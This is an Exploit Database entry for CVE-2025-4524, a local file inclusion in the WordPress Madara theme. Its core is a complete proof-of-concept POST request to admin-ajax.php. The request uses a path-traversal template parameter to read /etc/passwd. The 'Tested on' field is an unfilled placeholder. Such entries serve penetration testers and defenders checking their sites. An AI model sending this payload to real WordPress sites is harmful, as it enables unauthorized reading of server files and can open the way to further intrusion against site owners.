[webapps] WordPress Madara - Local File Inclusion

EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING WordPress Madara - Local File Inclusion EDB-ID: 52487 CVE: 2025-4524 EDB Verified: Author: BEATRIZ FRESNO NAUMOVA Type: WEBAPPS Exploit:   /   Platform: MULTIPLE Date: 2026-04-06 Vulnerable App: # Exploit Title: WordPress Madara Local File Inclusion # Date: November 1, 2025 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: WordPress Theme Madara # Software Link: WordPress Theme Madara # Tested on: [OS / PHP / WordPress versions used in testing — e.g., Ubuntu 22.04, PHP 8.1, WP 6.4] # CVE: CVE-2025-4524 #Attack Vector body="/wp-content/plugins/madara/" #POC POST /wp-admin/admin-ajax.php HTTP/2 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 490 action=madara_load_more&page=1&template=plugins/../../../../../../../etc/passwd&vars%5Borderby%5D=meta_value_num&vars%5Bpaged%5D=1&vars%5Btimerange%5D=&vars%5Bposts_per_page%5D=16&vars%5Btax_query%5D%5Brelation%5D=OR&vars%5Bmeta_query%5D%5B0%5D%5Brelation%5D=AND&vars%5Bmeta_query%5D%5Brelation%5D=AND&vars%5Bpost_type%5D=wp-manga&vars%5Bpost_status%5D=publish&vars%5Bmeta_key%5D=_latest_update&vars%5Border%5D=desc&vars%5Bsidebar%5D=right&vars%5Bmanga_archives_item_layout%5D=big_thumbnail Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services